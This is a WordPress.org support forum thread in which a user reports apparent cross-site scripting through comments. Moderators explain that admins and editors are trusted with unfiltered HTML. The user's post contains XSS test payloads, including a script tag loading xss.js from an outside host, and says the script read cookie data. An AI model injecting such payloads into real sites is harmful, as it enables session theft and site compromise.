Huge Security Risk – how come nobody fixed that yet?

Resolved euromark
(@euromark)

13 years, 10 months ago

http://ha.ckers.org/xss.html has some test strings (they are harmless). But others might not be!

So how come nobody solves this security risk yet?
its as easy as htmlspecialchars() every comment / user input.

See these examples:
they are triggered in the backend as well as in the frontend (and can inject very dangerous code).

‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

the result is:
a) reading out all cookie data: “This is remote text via xss.js located at ha.ckers.org wp-settings-1=…”
b) breaking the layout (white screen of death)
c) and other
and this is not even close to what xss is capable of. just an example.
usually the admin is not aware of it and the “dangerous code” has full admin rights as well. all get/ajax related requests could be triggered automatically with full admin rights.

Viewing 4 replies - 1 through 4 (of 4 total)

Chris Olbekson
(@c3mdigital)

13 years, 10 months ago

Have you reported this yet? http://codex.wordpress.org/Security_FAQ

Thread Starter euromark
(@euromark)

13 years, 10 months ago

i would have thought that somebody already found that out – with 100000 of distributions so far…^^

for the public area i can install a code highlight plugin. some are capable of securing the output (most are not!).
but for the admin area i am not sure how to implement security hacks.

just started to use wordpress – and i am shocked.
those things are absolutely standard procedure in every web project

Chris_K
(@handysolo)

13 years, 10 months ago

@euromark — were you logged in to WordPress at the time?

From Peter Westwood:

This reads very much like the standard report of XSS issues which are only present when you are logged in as an admin as you are inherently a trusted user.

The place to to point the user is this FAQ entry – http://codex.wordpress.org/Security_FAQ#Why_are_some_users_allowed_to_post_unfiltered_HTML.3F

Then ask them to report to security@wordpress.org if they find a real issue using a non-admin / editor user

Moderator Samuel Wood (Otto)
(@otto42)

WordPress.org Admin

13 years, 10 months ago

Agreed, Admins and Editors have the unfiltered html capability, and yes, they can insert bad code. But if you don’t have the user role to do that, then you can’t do that.

Make a new user lower than an Editor, then try your attack as that user. If it works, let us know.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Huge Security Risk – how come nobody fixed that yet?’ is closed to new replies.

Huge Security Risk – how come nobody fixed that yet?

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics